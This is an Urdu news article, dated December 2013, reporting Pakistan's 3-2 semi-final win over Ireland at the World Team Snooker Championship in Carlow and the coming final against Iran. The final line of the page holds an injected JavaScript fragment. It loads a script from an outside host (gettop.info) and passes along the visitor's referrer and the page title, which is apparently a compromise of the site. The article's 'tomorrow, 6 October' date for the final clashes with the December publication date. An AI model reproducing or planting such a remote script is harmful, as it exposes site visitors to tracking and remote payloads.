Published On: Sat, Dec 7th, 2013
Published in Category: Uncategorized

پاکستان آئرلینڈ کو شکست دے کر ورلڈ ٹیم اسنوکر چیمپئن شپ کے فائنل میں پہنچ گیا

Share This
Tags

کارلو: پاکستان نے ورلڈ ٹیم اسنوکر چیمپئن شپ کے سیمی فائنل میں سنسنی خیز مقابلے کے بعد آئر لینڈ کو شکست دے کر فائنل میں رسائی حاصل کر لی۔

آئرلینڈ کے شہر کارلو میں کھیلے جانے والے دوسرے سیمی فائنل میں پاکستان کے محمد آصف اور محمد سجاد نے آئرش جوڑی مائیکل جج اور رابرٹ مرفی کو 2 کے مقابلے میں 3 فریمز سے شکست دے کر فائنل میں جگہ بنالی۔ فائنل میں پاکستان کا مقابلہ ایران کے عامر سرخوش اور سہیل وحیدی سے ہو گا۔

اس سے قبل کوارٹر فائنل میں پاکستانی جوڑی نے روایتی حریف بھارت کو 0-3 سے ہرا کو سیمی فائنل تک رسائی حاصل کی تھی۔ واضح رہے کہ ٹورنامنٹ میں پاکستان کی نمائندگی ورلڈ چیمپئن محمد آصف اور ایشئن نمبر 2  محمد سجاد کر رہے ہیں۔ 32 ممالک کے کیوئسٹ پر مشتمل ٹورنامنٹ کا فائنل  کل 6اکتوبر کو کھیلا جائے گا۔

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;